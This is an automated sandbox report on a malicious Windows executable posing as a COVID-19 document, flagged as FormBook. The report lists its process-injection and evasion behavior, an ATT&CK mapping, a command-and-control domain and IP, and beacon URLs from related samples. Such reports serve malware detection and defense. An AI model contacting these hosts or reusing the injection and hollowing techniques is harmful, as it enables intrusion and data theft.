          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information11Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 425178 Sample: COVID-19-Related Requirements.exe Startdate: 26/05/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 COVID-19-Related Requirements.exe 3 2->10         started        process3 file4 32 C:\...\COVID-19-Related Requirements.exe.log, ASCII 10->32 dropped 52 Injects a PE file into a foreign processes 10->52 14 COVID-19-Related Requirements.exe 10->14         started        17 COVID-19-Related Requirements.exe 10->17         started        19 COVID-19-Related Requirements.exe 10->19         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 21 explorer.exe 14->21 injected process8 dnsIp9 34 www.portablesteamsaunas.com 52.58.78.16, 49748, 80 AMAZON-02US United States 21->34 44 System process connects to network (likely due to code injection or exploit) 21->44 25 wscript.exe 21->25         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 25->46 48 Maps a DLL or memory area into another process 25->48 50 Tries to detect virtualization through RDTSC time measurements 25->50 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          COVID-19-Related Requirements.exe23%VirustotalBrowse
          COVID-19-Related Requirements.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          COVID-19-Related Requirements.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          15.2.COVID-19-Related Requirements.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.portablesteamsaunas.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.fontbureau.commQ0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.portablesteamsaunas.com/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.tiffanysbeautybling.com/cgsp/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.portablesteamsaunas.com
          		52.58.78.16
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.tiffanysbeautybling.com/cgsp/true
            • Avira URL Cloud: safe
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                    		high
                    http://www.portablesteamsaunas.comwscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://api.imgur.com/oauth2/authorize?client_id=COVID-19-Related Requirements.exefalse
                          		high
                          http://www.fontbureau.com/designersexplorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.commQCOVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sajatypeworks.comCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comcomCOVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://api.imgur.com/oauth2/tokenCOVID-19-Related Requirements.exefalse
                                  		high
                                  http://www.galapagosdesign.com/DPleaseCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.portablesteamsaunas.com/wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fonts.comCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comCOVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.imgur.com/3/image/COVID-19-Related Requirements.exefalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        52.58.78.16
                                        		www.portablesteamsaunas.comUnited States
                                        		16509AMAZON-02UStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:425178
                                        Start date:26.05.2021
                                        Start time:19:57:40
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:COVID-19-Related Requirements.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:27
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@11/1@1/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 22.1% (good quality ratio 20.1%)
                                        • Quality average: 74.2%
                                        • Quality standard deviation: 31.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 92.122.145.220, 104.43.193.48, 20.82.210.154, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 92.122.144.200, 20.50.102.62
                                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        52.58.78.16N20210526.exeGet hashmaliciousBrowse
                                        • www.fortwayneduiattorney.com/cca/?nRYXM4=DQkKoy4PFhxvpfy0yA/zfG9zgCj3jVN+xnbFtEbC29HfrQWL+0F/38DF1Au9lzaxthz4&D8OLc=wh38e8H0rf
                                        Po_23456.pdf.exeGet hashmaliciousBrowse
                                        • www.diamondpolishingtools.com/gad0/?V4=inHXLVZPo&wPN=v3qsT70juIFjFhXaN1zc5giFJQsg+jwtwalemn0+QVkKIDmC7h+wc477+cDBqmBfEGWj
                                        DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                                        • www.whizbets.com/ubqx/?VR-T5=lhf8xpGpMnD8mnA&XR-xe0lh=qbpbcgrgrphYC+6vw+rR3rVPLZfPDXctKQyllVhhIijJLSCUP09c2csQ37Z/zesXfed47+3oQw==
                                        RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                        • www.vaginalmedicine.com/m3rc/?5jR=t8ELujbh7xT0&mTftc2P=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTcwtZfJNq3E7cX5npg==
                                        SWIFT_EU.EXEGet hashmaliciousBrowse
                                        • www.transferpricingautomation.com/pb93/?tXUh=NqHMizgA0l6RZn3X1T24NTnxDB/y4DGGbp92gRT3DZeqJp8ZQfN9sULjdASqL4q0TkYP&DTs4a=ctxDHdNX
                                        Contract 2021080378818.xlsxGet hashmaliciousBrowse
                                        • www.newmopeds.com/p2io/?flyt8dLp=bSK1RxPMHjVQe9mhMJ2LeA3okZHmhG3V4GBmTatllgIVkFsFULHDN3EeY50sHAiR0AoDRA==&QZJxKZ=Zvs8QD08M2oD
                                        Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                        • www.seatedmeals.com/un8c/?vR=Ltxx&5j9=colWh+DuPEm5JCAtLfAoITi+6qtCabRxw+nOyJQemXYkKvsa29PMV3JN11EPgH6ZGo/2
                                        fbfcbf13_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.transferpricingautomation.com/pb93/?oj2DZX=NqHMizgA0l6RZn3X1T24NTnxDB/y4DGGbp92gRT3DZeqJp8ZQfN9sULjdDy6EZ6MNBxI&ET8l=0pW8ZruPWD1HJLm0
                                        SWIFT jpg.exeGet hashmaliciousBrowse
